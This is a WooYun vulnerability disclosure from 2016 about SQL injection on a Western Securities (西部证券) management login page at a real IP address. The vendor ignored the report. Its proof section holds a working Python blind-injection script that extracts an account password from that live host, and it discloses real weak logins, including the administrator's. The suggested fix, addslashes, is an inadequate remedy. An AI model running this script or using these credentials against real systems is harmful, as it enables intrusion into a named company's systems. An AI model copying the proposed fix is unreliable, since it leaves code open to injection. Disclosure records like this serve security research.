当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0174950

漏洞标题:西部证券某站SQL注入

相关厂商:西部证券

漏洞作者: ucifer

提交时间:2016-02-07 15:18

修复时间:2016-02-22 09:00

公开时间:2016-02-22 09:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-02-07: 细节已通知厂商并且等待厂商处理中
2016-02-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

bool型盲注

详细说明:

http://123.138.29.71:8080/manage/login.html

屏幕快照 2016-02-05 下午3.11.35.png


屏幕快照 2016-02-05 下午3.11.47.png


根据这个

 WooYun: 西部证券客服系统未授权访问+可更改任意客服账号的密码 


找到一个可用的用户名kf0001
然后写代码枚举密码

漏洞证明:

#!/usr/bin/env python
#coding=utf-8
import sys
import requests
reload(sys)
sys.setdefaultencoding('utf-8')
url = "http://123.138.29.71:8080/manage/login.jsp"
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
key = ""
for j in range(1,10,1):
for i in range(1,130,1):
payload = {
"adminid":"kf0001' AND ASCII(SUBSTR(password,"+str(j)+",1))='"+str(i),
"password":"123"
}
try:
req = requests.post(url, data=payload, headers=headers)
if "输入密码不正确" in req.text:
print "第%d位: "%j + chr(i)
key = key + chr(i)
break
else:
pass
except Exception as e:
print e
print "密码: "+key


屏幕快照 2016-02-05 下午3.16.47.png


密码是弱口令。。登录

屏幕快照 2016-02-05 下午3.17.53.png


屏幕快照 2016-02-05 下午3.19.10.png


管理员sysadmin密码password 也是弱口令

屏幕快照 2016-02-05 下午3.23.03.png

修复方案:

addslashes

版权声明:转载请注明来源 ucifer@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-02-22 09:00

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无